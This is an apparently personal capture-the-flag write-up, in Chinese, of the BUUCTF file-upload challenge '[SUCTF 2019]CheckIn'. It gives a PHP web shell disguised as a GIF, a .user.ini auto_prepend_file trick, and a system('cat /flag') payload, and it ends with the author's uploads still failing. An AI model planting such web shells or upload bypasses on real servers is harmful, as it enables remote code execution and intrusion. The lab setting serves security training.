106，【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩，桌面有啥传啥 

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?
<script language="php">eval($_GET['123']);</script>

 123即密码，可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行 

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a
auto_prepend_file=123(3).php.jpg

 

文件名

123(3).php.jpg

文件内容

GIF89a
<script language='php'>system('cat /flag');</script> 

 

 按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名，还是上传不成功

摧毁靶机，重试

 

要么url中81就不见了，像上图 

要么返回上传页面

还发现不管上传什么路径都不变，尝试上传下面这张图片，还是那个路径，不是，路径变都不变，还是没上传成功，访问不到，这只是一个中规中矩的图片

 尝试修改文件那么多遍，合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500，搜搜看什么意思

so???????????????????????????????